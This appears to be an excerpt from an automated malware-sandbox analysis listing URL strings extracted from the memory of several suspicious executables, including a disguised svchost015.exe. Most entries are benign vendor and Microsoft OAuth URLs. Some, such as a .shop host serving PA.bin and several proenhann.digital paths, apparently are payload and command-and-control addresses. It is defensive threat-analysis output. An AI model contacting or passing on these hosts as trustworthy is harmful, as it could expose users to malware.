Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://h1.passionwhenever.shop/PA.binheckedl3
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://h1.passionwhenever.shop/w
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2183001059.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206946004.00000000009E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://h1.passionwhenever.shop:443/PA.binofD
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/nativeclient
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/nativeclientesumsoft.poppeeper://authoutlook_%uwl.im
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/token
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://mail.google.com/
Source: powershell.exe, 0000000B.00000002.1844484241.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1979002205.0000000005C89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://outlook.office.com/IMAP.AccessAsUser.All
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://outlook.office.com/POP.AccessAsUser.All
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://outlook.office.com/SMTP.Send
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://outlook.office.com/SMTP.Sendhttps://login.microsoftonline.com/common/oauth2/v2.0/authorize?c
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://outlook.office.com/SMTP.Sendhttps://outlook.office.com/IMAP.AccessAsUser.All
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1981303672.00000000009A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/W
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2032860989.0000000003902000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2052778119.0000000003900000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2073905851.0000000003912000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2056832148.0000000003912000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2059156988.0000000003912000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2037882872.000000000390D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2034205082.000000000390C000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2054043095.0000000003905000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2037912099.0000000003910000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1981157929.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/thnb
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2207184481.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/thnb5
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206752083.00000000009CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/thnb?J
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206752083.00000000009CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/thnbd
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2004710436.000000000390E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/thnbe
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2052778119.000000000390D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/thnbf
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2126674525.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://proenhann.digital/w
Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://support.google.com/accounts/answer/185833
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://update.esumsoft.com/Banner/poppeeper.ppb
Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://update.esumsoft.com/Banner/poppeeper.ppb12029Time:
Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://update.esumsoft.com/POPPeeper/
Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://update.esumsoft.com/POPPeeper/?date=000000&beta=&qc=1&WMVer=&WmFlags=&A=&if=&pac=&ppver=
Source: svchost015.exe, 00000001.00000003.1706932736.000000000384E000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://update.esumsoft.com/POPPeeper/WebMailVer.txt
Source: svchost015.exe, 00000001.00000003.1706932736.000000000384E000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://update.esumsoft.com/POPPeeper/WebMailVer.txtWebMailVer:
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2209383400.0000000003909000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2209776881.00000000039E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2209776881.00000000039E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: DrjfIAN86u.exe, 00000003.00000003.1535033375.0000000002440000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.exe, 00000003.00000002.2572553577.0000000002111000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.exe, 00000003.00000003.1535224425.0000000002111000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000002.2574127597.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000002.2573579155.000000000078A000.00000004.00000020.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000003.1538252672.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, DrjfIAN86u.tmp, 00000004.00000003.1538168918.0000000003100000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com
Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/
Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/buy/
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/buy/?prod=pppro
Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/buy/?prod=ppprohttps://www.esumsoft.com/products/pop-peeper/pro/0
Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/buy/https://www.esumsoft.com/buy/clk
Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/customfiles/PP_Lang/LangFiles.txt
Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/customfiles/PP_Lang/LangFiles.txtThread
Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/customscripts/ProductActivationV3.php?ver=3&c=1
Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: https://www.esumsoft.com/customscripts/ProductActivationV3.php?ver=3&c=1https://www.esumsoft.com/cus
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customscripts/ProductActivationV4.php?ver=4&c=1
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customscripts/curtime.php
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/customscripts/curtime.phphttp://https://Use
                    Source: svchost015.exe, 00000001.00000003.1705800888.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/donation/
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/download/
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/pp-faqdatapath
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/pp-faqdatapathIni
                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/pp-pro/
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/ppfaq?q=error_ssl_hostnamemismatch
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/ppfaq?q=error_ssl_hostnamemismatchunknown
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/ppfaq?q=error_ssl_selfsigned
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/ppfaq?q=error_ssl_selfsignedself
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/banner/?blocked=1
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/banner/?blocked=1https://www.esumsoft.com/products/pop-
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/banner/?blocked=1m05Click
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/faq/
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/faq/https://www.esumsoft.com/Backup/Restorehttps://www.
